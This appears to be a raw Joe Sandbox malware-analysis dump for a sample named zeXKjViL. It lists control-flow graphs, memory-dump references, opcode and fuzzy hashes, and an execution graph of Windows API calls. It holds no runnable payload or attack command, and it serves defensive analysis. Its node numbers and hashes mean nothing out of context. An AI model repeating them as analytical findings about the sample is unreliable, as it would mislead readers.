                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F91138B1D002088FCB10DFAAC444AEEFBF4FF48320F14842AD459A7210C774A944CFA5

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1539 1084b70-1084b7c GetUserDefaultUILanguage 1540 1084c19 1539->1540 1541 1084b82 1539->1541 1543 1084c1f-1084c24 1540->1543 1544 1084f26-1084f2f 1540->1544 1541->1540 1542 1084b88-1084b8e 1541->1542 1545 1084e82 1544->1545 1546 1084f35 1544->1546 1548 1084ebb-1084ec9 1545->1548 1549 1084e84 1545->1549 1546->1545 1547 1084f3b 1546->1547 1547->1547 1551 1084e50 1549->1551 1552 1084ea3 1549->1552 1551->1552 1553 1084e52 1551->1553 1553->1545
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetUserDefaultUILanguage.KERNELBASE ref: 01084B76
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000022.00000002.1983376643.0000000001084000.00000040.00001000.00020000.00000000.sdmp, Offset: 01084000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_34_2_1084000_zeXKjViL.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: DefaultLanguageUser
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 95929093-0
                                                                                                                                                                                                                                      • Opcode ID: 9ef81b3ca4733e229c29838f03a49051363783657f25cfadd12def8c05807e8f
                                                                                                                                                                                                                                      • Instruction ID: 0428198a312e831f1c4483b128788a3ae73de48c220b248e302f116cf84a4f01
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9ef81b3ca4733e229c29838f03a49051363783657f25cfadd12def8c05807e8f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 75E0202980C563D5EFF2753C890533C75C4DB10376FD802D79BE1D68D3825541804143

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1554 3689308-3689377 CloseHandle 1557 3689379-368937f 1554->1557 1558 3689380-36893a5 1554->1558 1557->1558
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000022.00000002.2025883157.0000000003680000.00000040.00000800.00020000.00000000.sdmp, Offset: 03680000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_34_2_3680000_zeXKjViL.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                                                                                      • Opcode ID: 0e29ec1b94270c487f18de64edef81beae58e0aec5c1522fee7d8ed9c1454c7d
                                                                                                                                                                                                                                      • Instruction ID: 188970301df3ecce4b8057ae366d0fc2e84f43e6a1fe7a8bee5d552a9f7014d7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0e29ec1b94270c487f18de64edef81beae58e0aec5c1522fee7d8ed9c1454c7d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FF113AB19002488FCB10DFAAC4457EEFBF4EB88324F24841AD559A7250C774A944CF95

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1562 1085d20 1563 1085d22 1562->1563 1564 1085d26-1085d2d 1562->1564 1563->1564 1567 1085d24 1563->1567 1565 1085d2f 1564->1565 1566 1085d36-1085d37 1564->1566 1565->1566 1568 1085d30-1085d31 1565->1568 1569 1085d39-1085d42 VirtualAlloc 1566->1569 1570 1085d5d 1566->1570 1567->1564 1571 1085d33-1085d35 1568->1571 1569->1571 1572 1085d44 1569->1572 1573 1085d5f 1570->1573 1574 1085d64 1570->1574 1571->1566 1572->1571 1575 1085d46 1572->1575 1573->1574 1576 1085d61 1573->1576 1577 1085d69-1085d73 VirtualFree 1574->1577 1578 1085d66 1574->1578 1576->1574 1579 1085d63 1576->1579 1578->1577 1580 1085d68 1578->1580 1579->1574 1580->1577
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000022.00000002.1983376643.0000000001084000.00000040.00001000.00020000.00000000.sdmp, Offset: 01084000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_34_2_1084000_zeXKjViL.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: c0b80c9930e4615513bedd772b6a78a72c39c6766cbcd2e22b5dff0a89162319
                                                                                                                                                                                                                                      • Instruction ID: e1b99bf5b5add962d834de133cdab2bbeac45d15f004ab8a9bc2708d8b2f10db
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c0b80c9930e4615513bedd772b6a78a72c39c6766cbcd2e22b5dff0a89162319
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A3E04F5290C300AAE6BB3BAC9C1EBA17EE06B02659F8D04DDAFC0961A3F6545413C512

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1581 1085d50 1582 1085d52 1581->1582 1583 1085d54-1085d5b 1581->1583 1582->1583 1584 1085d5d 1583->1584 1585 1085d64 1583->1585 1584->1585 1586 1085d5f 1584->1586 1587 1085d69-1085d73 VirtualFree 1585->1587 1588 1085d66 1585->1588 1586->1585 1589 1085d61 1586->1589 1588->1587 1590 1085d68 1588->1590 1589->1585 1591 1085d63 1589->1591 1590->1587 1591->1585
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 01085D6D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000022.00000002.1983376643.0000000001084000.00000040.00001000.00020000.00000000.sdmp, Offset: 01084000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_34_2_1084000_zeXKjViL.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FreeVirtual
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1263568516-0
                                                                                                                                                                                                                                      • Opcode ID: 711040bb3eb8fe1787238b96dadd446917ed0afe7d1f8351bc9c0a7492d63a69
                                                                                                                                                                                                                                      • Instruction ID: 7fb2802442e85ba68a79c821b60639db401003de2a25f843d0dfd79fb2c76919
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 711040bb3eb8fe1787238b96dadd446917ed0afe7d1f8351bc9c0a7492d63a69
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E2D0922CA4C30099EEFE3E1DED8C73039D52360A20E0C82C0AEC1190A352524C078982
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000022.00000002.1983376643.0000000001084000.00000040.00001000.00020000.00000000.sdmp, Offset: 01084000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_34_2_1084000_zeXKjViL.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1452528299-0
                                                                                                                                                                                                                                      • Opcode ID: 8efbd4d50cd07fb60503ad9452132107a0fd21d41f4ae19f030914a41b32b70c
                                                                                                                                                                                                                                      • Instruction ID: f6239f624d12c8e74347b6481ba3e3ac97bfac357c971c3e6bbade72b1e98ce6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8efbd4d50cd07fb60503ad9452132107a0fd21d41f4ae19f030914a41b32b70c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2EB092A1A0E784CEEB622764681D1983BB0A8822C63498097DCC2C6227F21988054A21

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 2758 344d5f0-344d602 2759 344d696-344d69d 2758->2759 2760 344d608 2758->2760 2761 344d60a-344d616 2759->2761 2760->2761 2763 344d6a2-344d6a7 2761->2763 2764 344d61c-344d63e 2761->2764 2763->2764 2765 344d640-344d65e 2764->2765 2766 344d6ac-344d6c1 2764->2766 2768 344d666-344d676 2765->2768 2771 344d678-344d680 2766->2771 2770 344d6ce 2768->2770 2768->2771 2772 344d682-344d693 2771->2772 2773 344d6c3-344d6cc 2771->2773 2773->2772
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000022.00000002.2013345099.000000000344D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0344D000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_34_2_344d000_zeXKjViL.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: b168b7ac7129cb2063f2a87525714ada50946bae79f719b0dae7ccb87a0e5584
                                                                                                                                                                                                                                      • Instruction ID: d5f4c95af40d94233bf2bed91439881c6ab06cd0faf4ac50882fd525b69846bd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b168b7ac7129cb2063f2a87525714ada50946bae79f719b0dae7ccb87a0e5584
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F2106B1904240DFEB05EF14D9C0B2BBF65EB89310F2485BAE8094F36BC336D456CAA5

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 2775 344d5eb-344d602 2776 344d696-344d69d 2775->2776 2777 344d608 2775->2777 2778 344d60a-344d616 2776->2778 2777->2778 2780 344d6a2-344d6a7 2778->2780 2781 344d61c-344d63e 2778->2781 2780->2781 2782 344d640-344d65e 2781->2782 2783 344d6ac-344d6c1 2781->2783 2785 344d666-344d676 2782->2785 2788 344d678-344d680 2783->2788 2787 344d6ce 2785->2787 2785->2788 2789 344d682-344d693 2788->2789 2790 344d6c3-344d6cc 2788->2790 2790->2789
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000022.00000002.2013345099.000000000344D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0344D000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_34_2_344d000_zeXKjViL.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: b90c45bf349dc2233ec1b6a7f64fdb6126ff75985651e60f21b20b7a1f428906
                                                                                                                                                                                                                                      • Instruction ID: 366623c5409a4b6eac78597123d204919b630caf4b6778f7af1cc8022f90a873
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b90c45bf349dc2233ec1b6a7f64fdb6126ff75985651e60f21b20b7a1f428906
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C119D76904280CFDB16DF14D5C4B16BF61FB85314F28C5AAD8490B266C336D45ACBA1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000022.00000002.2013345099.000000000344D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0344D000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_34_2_344d000_zeXKjViL.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 816f9e9675384c9bb54965ea67bfebd208f9785bd2f752ea85ca72c0c9b18312
                                                                                                                                                                                                                                      • Instruction ID: b8a7cb930d990d3f6318973ab85d71f5f6274f0074f1128f751aefe35a6183d0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 816f9e9675384c9bb54965ea67bfebd208f9785bd2f752ea85ca72c0c9b18312
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C01047140E3C05ED7128B25C894752BFB4EF53224F1D85DBD9848F297C2795849C776
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000022.00000002.2013345099.000000000344D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0344D000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_34_2_344d000_zeXKjViL.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 4728f1a9c1da6c347963d2d0609f32b01f9bfe9a196cff0ecb186c8f3adf509b
                                                                                                                                                                                                                                      • Instruction ID: 0451ef022df2ed92795926aef56a655ebb388bf8aae2e4b1d4a367d445790662
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4728f1a9c1da6c347963d2d0609f32b01f9bfe9a196cff0ecb186c8f3adf509b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8401DF718093009AF7208A29CD84B67BF98EF42328F0CC57BEC180F287C2799846C6B5
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000022.00000002.1983376643.0000000001084000.00000040.00001000.00020000.00000000.sdmp, Offset: 01084000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_34_2_1084000_zeXKjViL.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: d$w
                                                                                                                                                                                                                                      • API String ID: 0-2400632791
                                                                                                                                                                                                                                      • Opcode ID: 79c2c8e566fd5401378d08b07d8d9b33f9704efa08524d2202d7d52e6b7a7c15
                                                                                                                                                                                                                                      • Instruction ID: fab9169da52b176ea878b941868e83bd17176fd1efb43ee6e780ea34f7906237
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 79c2c8e566fd5401378d08b07d8d9b33f9704efa08524d2202d7d52e6b7a7c15
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 93C12635A08384AEFEF786EC4F18B793EE46B42660FCF41C5F7D68A0A3D62558049652

                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                      Execution Coverage:10.7%
                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                                                                                      Total number of Nodes:453
                                                                                                                                                                                                                                      Total number of Limit Nodes:46
                                                                                                                                                                                                                                      execution_graph 28747 2e85238 28748 2e8524f 28747->28748 28754 2e84e0c 28748->28754 28750 2e852be 28761 64c16b8 28750->28761 28765 64c1660 28750->28765 28755 2e84e17 28754->28755 28769 2e86dc4 28755->28769 28757 2e87a04 28759 6456890 7 API calls 28757->28759 28773 6456889 28757->28773 28758 2e87abe 28758->28750 28759->28758 28762 64c16c7 28761->28762 28805 64c12f4 28762->28805 28766 64c1648 28765->28766 28766->28765 28767 64c12f4 OleInitialize 28766->28767 28768 2e852c5 28767->28768 28770 2e86dcf 28769->28770 28778 2e86e30 28770->28778 28772 2e87b6d 28772->28757 28774 645688e 28773->28774 28775 64568dd 28774->28775 28776 645add8 7 API calls 28774->28776 28777 645ade8 7 API calls 28774->28777 28775->28758 28776->28775 28777->28775 28779 2e86e3b 28778->28779 28782 2e86e60 28779->28782 28781 2e87c42 28781->28772 28783 2e86e6b 28782->28783 28786 2e86e90 28783->28786 28785 2e87d54 28785->28781 28787 2e86e9b 28786->28787 28788 2e8ae4b 28787->28788 28790 2e8d2f8 28787->28790 28788->28785 28794 2e8d330 28790->28794 28797 2e8d321 28790->28797 28791 2e8d30e 28791->28788 28795 2e8d33f 28794->28795 28800 2e8d418 28794->28800 28795->28791 28799 2e8d418 GetModuleHandleW 28797->28799 28798 2e8d33f 28798->28791 28799->28798 28801 2e8d45c 28800->28801 28802 2e8d439 28800->28802 28801->28795 28802->28801 28803 2e8d660 GetModuleHandleW 28802->28803 28804 2e8d68d 28803->28804 28804->28795 28807 64c12ff 28805->28807 28809 64c1334 28807->28809 28808 64c17ad 28808->28808 28812 64c133f 28809->28812 28810 64c1a28 28811 64c1a40 28810->28811 28815 64c15a8 28810->28815 28811->28808 28812->28810 28812->28811 28813 64c15a8 OleInitialize 28812->28813 28813->28810 28817 64c15b3 28815->28817 28816 64c2df9 28816->28811 28817->28816 28819 64c2194 28817->28819 28820 64c219f 28819->28820 28821 64c3113 28820->28821 28823 64c21b0 28820->28823 28821->28816 28824 64c3148 OleInitialize 28823->28824 28825 64c31ac 28824->28825 28825->28821 28933 6453e70 28934 6453ed8 CreateWindowExW 28933->28934 28936 6453f94 28934->28936 28936->28936 28393 2dbd01c 28394 2dbd034 28393->28394 28395 2dbd08e 28394->28395 28402 6454d79 28394->28402 28410 6451b5c 28394->28410 28414 6451b6c 28394->28414 28422 6454150 28394->28422 28426 6454017 28394->28426 28432 6454028 28394->28432 28406 6454db5 28402->28406 28403 6454de9 28404 6454de7 28403->28404 28449 6451c94 28403->28449 28406->28403 28407 6454dd9 28406->28407 28438 6454f00 28407->28438 28444 6454f10 28407->28444 28411 6451b67 28410->28411 28547 6451b94 28411->28547 28413 6454167 28413->28395 28415 6451b77 28414->28415 28416 6454de9 28415->28416 28418 6454dd9 28415->28418 28417 6451c94 CallWindowProcW 28416->28417 28419 6454de7 28416->28419 28417->28419 28420 6454f00 CallWindowProcW 28418->28420 28421 6454f10 CallWindowProcW 28418->28421 28420->28419 28421->28419 28423 6454160 28422->28423 28424 6451b94 SetWindowLongW 28423->28424 28425 6454167 28424->28425 28425->28395 28427 6454028 28426->28427 28428 6451b5c SetWindowLongW 28427->28428 28429 645405a 28428->28429 28430 6451b6c CallWindowProcW 28429->28430 28431 645406f 28430->28431 28431->28395 28433 645404e 28432->28433 28434 6451b5c SetWindowLongW 28433->28434 28435 645405a 28434->28435 28436 6451b6c CallWindowProcW 28435->28436 28437 645406f 28436->28437 28437->28395 28439 6454ee7 28438->28439 28441 6454f0e 28438->28441 28439->28404 28440 6454fb0 28440->28404 28453 6454fb9 28441->28453 28459 6454fc8 28441->28459 28445 6454f24 28444->28445 28447 6454fb9 CallWindowProcW 28445->28447 28448 6454fc8 CallWindowProcW 28445->28448 28446 6454fb0 28446->28404 28447->28446 28448->28446 28450 6451c9f 28449->28450 28451 645664a CallWindowProcW 28450->28451 28452 64565f9 28450->28452 28451->28452 28452->28404 28454 6454fc8 28453->28454 28455 6454fd9 28454->28455 28464 64564c4 28454->28464 28469 645ba30 28454->28469 28473 645ba40 28454->28473 28455->28440 28460 6454fd9 28459->28460 28461 64564c4 CallWindowProcW 28459->28461 28462 645ba40 CallWindowProcW 28459->28462 28463 645ba30 CallWindowProcW 28459->28463 28460->28440 28461->28460 28462->28460 28463->28460 28465 64564ce 28464->28465 28466 6456531 28465->28466 28467 6451c94 CallWindowProcW 28465->28467 28466->28455 28468 645659a 28467->28468 28468->28455 28470 645ba73 28469->28470 28477 645bd42 28470->28477 28471 645bad8 28471->28455 28474 645ba73 28473->28474 28476 645bd42 CallWindowProcW 28474->28476 28475 645bad8 28475->28455 28476->28475 28478 645bd4b 28477->28478 28479 645beb6 28478->28479 28483 645c2e0 28478->28483 28500 645c30f 28478->28500 28508 645c340 28478->28508 28479->28471 28484 645c2e3 28483->28484 28485 645c2eb 28484->28485 28486 645c333 28484->28486 28487 645c379 28484->28487 28485->28479 28494 645c34b 28486->28494 28496 645c2e0 CallWindowProcW 28486->28496 28498 645c30f CallWindowProcW 28486->28498 28516 645c370 28486->28516 28525 645c36e 28486->28525 28488 645c3a0 28487->28488 28489 645c37e 28487->28489 28490 6455980 CallWindowProcW 28488->28490 28491 645c38c 28489->28491 28534 6455980 28489->28534 28490->28494 28491->28479 28492 645c358 28492->28479 28494->28479 28495 645c3c8 28495->28479 28496->28492 28498->28492 28501 645c31b 28500->28501 28502 645c34b 28500->28502 28501->28502 28504 645c2e0 CallWindowProcW 28501->28504 28505 645c370 CallWindowProcW 28501->28505 28506 645c30f CallWindowProcW 28501->28506 28507 645c36e CallWindowProcW 28501->28507 28502->28479 28503 645c358 28503->28479 28504->28503 28505->28503 28506->28503 28507->28503 28509 645c352 28508->28509 28510 645c34b 28508->28510 28512 645c2e0 CallWindowProcW 28509->28512 28513 645c370 CallWindowProcW 28509->28513 28514 645c30f CallWindowProcW 28509->28514 28515 645c36e CallWindowProcW 28509->28515 28510->28479 28511 645c358 28511->28479 28512->28511 28513->28511 28514->28511 28515->28511 28517 645c379 28516->28517 28518 645c3a0 28517->28518 28519 645c37e 28517->28519 28520 6455980 CallWindowProcW 28518->28520 28521 645c38c 28519->28521 28522 6455980 CallWindowProcW 28519->28522 28524 645c3a7 28520->28524 28521->28492 28523 645c3c8 28522->28523 28523->28492 28524->28492 28526 645c379 28525->28526 28527 645c3a0 28526->28527 28528 645c37e 28526->28528 28529 6455980 CallWindowProcW 28527->28529 28530 645c38c 28528->28530 28531 6455980 CallWindowProcW 28528->28531 28533 645c3a7 28529->28533 28530->28492 28532 645c3c8 28531->28532 28532->28492 28533->28492 28536 64559cc 28534->28536 28535 6455a1d 28535->28495 28536->28535 28539 645c3d0 28536->28539 28543 645c3e0 28536->28543 28540 645c426 28539->28540 28541 6451c94 CallWindowProcW 28540->28541 28542 645c449 28540->28542 28541->28542 28542->28535 28544 645c426 28543->28544 28545 6451c94 CallWindowProcW 28544->28545 28546 645c449 28544->28546 28545->28546 28546->28535 28549 6451b9f 28547->28549 28548 64543f6 28549->28548 28551 6454088 28549->28551 28554 6451b7c 28551->28554 28555 64540b8 SetWindowLongW 28554->28555 28556 64540a0 28555->28556 28556->28548 28888 2e8f6c0 28889 2e8f706 GetCurrentProcess 28888->28889 28891 2e8f758 GetCurrentThread 28889->28891 28892 2e8f751 28889->28892 28893 2e8f78e 28891->28893 28894 2e8f795 GetCurrentProcess 28891->28894 28892->28891 28893->28894 28897 2e8f7cb 28894->28897 28895 2e8f7f3 GetCurrentThreadId 28896 2e8f824 28895->28896 28897->28895 28937 2e8fd10 DuplicateHandle 28938 2e8fda6 28937->28938 28557 645800c 28558 6458015 28557->28558 28560 6458033 28557->28560 28558->28560 28563 6456890 28558->28563 28561 6456890 7 API calls 28560->28561 28562 645816c 28560->28562 28561->28562 28564 64568a0 28563->28564 28565 64568dd 28564->28565 28568 645add8 28564->28568 28593 645ade8 28564->28593 28565->28560 28569 645ade5 28568->28569 28570 645af1b 28569->28570 28573 645aebf 28569->28573 28571 6452208 7 API calls 28570->28571 28579 645aef0 28570->28579 28571->28579 28618 6452208 28573->28618 28576 645af35 28643 6458e88 28576->28643 28623 6458ef4 28579->28623 28580 645af3d 28581 645b047 28580->28581 28582 6456890 7 API calls 28580->28582 28647 64516c0 28581->28647 28654 64516b0 28581->28654 28583 645afed 28582->28583 28586 6454088 SetWindowLongW 28583->28586 28584 645b0a8 28661 645a8d0 28584->28661 28665 645a8c1 28584->28665 28585 645b0bc 28587 645b010 28586->28587 28587->28581 28669 6458f64 28587->28669 28594 645ae21 28593->28594 28595 645af1b 28594->28595 28598 645aebf 28594->28598 28596 6452208 7 API calls 28595->28596 28604 645aef0 28595->28604 28596->28604 28597 6458ef4 7 API calls 28599 645af2b 28597->28599 28603 6452208 7 API calls 28598->28603 28600 6458f04 7 API calls 28599->28600 28601 645af35 28600->28601 28602 6458e88 7 API calls 28601->28602 28605 645af3d 28602->28605 28603->28604 28604->28597 28606 645b047 28605->28606 28607 6456890 7 API calls 28605->28607 28614 64516c0 2 API calls 28606->28614 28615 64516b0 2 API calls 28606->28615 28608 645afed 28607->28608 28611 6454088 SetWindowLongW 28608->28611 28609 645b0a8 28616 645a8c1 7 API calls 28609->28616 28617 645a8d0 7 API calls 28609->28617 28610 645b0bc 28612 645b010 28611->28612 28612->28606 28613 6458f64 7 API calls 28612->28613 28613->28606 28614->28609 28615->28609 28616->28610 28617->28610 28620 6452239 28618->28620 28622 6452347 28618->28622 28619 6452245 28619->28579 28620->28619 28676 64519f0 7 API calls 28620->28676 28622->28579 28625 6458eff 28623->28625 28624 645af2b 28629 6458f04 28624->28629 28625->28624 28626 6456890 7 API calls 28625->28626 28627 645d9f0 28626->28627 28628 6454088 SetWindowLongW 28627->28628 28628->28624 28630 6458f0f 28629->28630 28631 645df74 28630->28631 28632 645df21 28630->28632 28642 645dfa8 28630->28642 28683 645ba14 7 API calls 28630->28683 28640 6456890 7 API calls 28631->28640 28631->28642 28633 645df5a 28632->28633 28634 6458f64 7 API calls 28632->28634 28635 6458f64 7 API calls 28633->28635 28636 645df4c 28634->28636 28637 645df66 28635->28637 28677 645da44 28636->28677 28639 645da44 7 API calls 28637->28639 28639->28631 28640->28642 28642->28576 28644 6458e93 28643->28644 28645 6456890 7 API calls 28644->28645 28646 645a914 28644->28646 28645->28646 28646->28580 28648 64516df 28647->28648 28653 64516e5 28647->28653 28649 6451818 KiUserCallbackDispatcher 28648->28649 28648->28653 28687 64c0ad8 28648->28687 28691 64c0ac9 28648->28691 28649->28653 28653->28584 28656 64516c0 28654->28656 28655 64516e5 28655->28584 28656->28655 28657 6451818 KiUserCallbackDispatcher 28656->28657 28659 64c0ad8 SetWindowLongW 28656->28659 28660 64c0ac9 SetWindowLongW 28656->28660 28657->28655 28659->28657 28660->28657 28662 645a8dd 28661->28662 28663 6458e88 7 API calls 28662->28663 28664 645a8e4 28663->28664 28664->28585 28666 645a8dd 28665->28666 28667 6458e88 7 API calls 28666->28667 28668 645a8e4 28667->28668 28668->28585 28671 6458f6f 28669->28671 28670 645fbee 28670->28581 28671->28670 28672 6456890 7 API calls 28671->28672 28673 645fc48 28672->28673 28674 645e460 SendMessageW 28673->28674 28675 645fc59 28674->28675 28675->28581 28676->28622 28678 645da4f 28677->28678 28679 645fc48 28678->28679 28680 6456890 7 API calls 28678->28680 28684 645e460 28679->28684 28680->28679 28683->28632 28685 645fc70 SendMessageW 28684->28685 28686 645fc59 28685->28686 28686->28633 28688 64c0ae8 28687->28688 28690 6454088 SetWindowLongW 28688->28690 28689 64c0afa 28689->28649 28690->28689 28692 64c0ae8 28691->28692 28694 6454088 SetWindowLongW 28692->28694 28693 64c0afa 28693->28649 28694->28693 28695 645c548 28696 645c340 CallWindowProcW 28695->28696 28697 645c556 28696->28697 28698 645e108 28699 645e119 28698->28699 28702 645e183 28699->28702 28703 645daac 28699->28703 28704 645dab7 28703->28704 28705 645e17c 28704->28705 28708 645f898 28704->28708 28714 645f8a8 28704->28714 28720 645e41c 28708->28720 28711 645f8cf 28711->28705 28712 645f93b CreateIconFromResourceEx 28713 645f976 28712->28713 28713->28705 28715 645e41c CreateIconFromResourceEx 28714->28715 28717 645f8bf 28715->28717 28716 645f8cf 28716->28705 28717->28716 28718 645f93b CreateIconFromResourceEx 28717->28718 28719 645f976 28718->28719 28719->28705 28721 645f8f8 CreateIconFromResourceEx 28720->28721 28723 645f8bf 28721->28723 28723->28711 28723->28712 28724 6459108 28725 645911f 28724->28725 28727 6458cd8 28724->28727 28728 6458ce3 28727->28728 28730 64591d8 28728->28730 28733 64591e9 28728->28733 28738 64591f8 28728->28738 28729 64591a2 28729->28725 28730->28725 28734 64591f6 28733->28734 28736 645943d 28734->28736 28743 6459659 28734->28743 28736->28729 28740 64591fe 28738->28740 28739 6459473 28739->28729 28741 645943d 28740->28741 28742 6459659 7 API calls 28740->28742 28741->28729 28742->28739 28744 6459697 28743->28744 28745 645971e 28744->28745 28746 6456890 7 API calls 28744->28746 28746->28745 28826 6456718 28827 6456728 28826->28827 28833 645d478 28827->28833 28839 645d468 28827->28839 28845 645d3d0 28827->28845 28853 645d430 28827->28853 28828 6456751 28834 645d479 28833->28834 28860 6457d60 28834->28860 28836 645d502 28872 645b930 28836->28872 28838 645d509 28838->28828 28840 645d473 28839->28840 28841 6457d60 7 API calls 28840->28841 28842 645d502 28841->28842 28843 645b930 7 API calls 28842->28843 28844 645d509 28843->28844 28844->28828 28846 645d3f3 28845->28846 28848 645d439 28845->28848 28846->28828 28847 645d43b 28847->28828 28848->28847 28849 6457d60 7 API calls 28848->28849 28850 645d502 28849->28850 28851 645b930 7 API calls 28850->28851 28852 645d509 28851->28852 28852->28828 28854 645d433 28853->28854 28855 645d479 28853->28855 28854->28828 28856 6457d60 7 API calls 28855->28856 28857 645d502 28856->28857 28858 645b930 7 API calls 28857->28858 28859 645d509 28858->28859 28859->28828 28865 6457d8c 28860->28865 28862 6457fc4 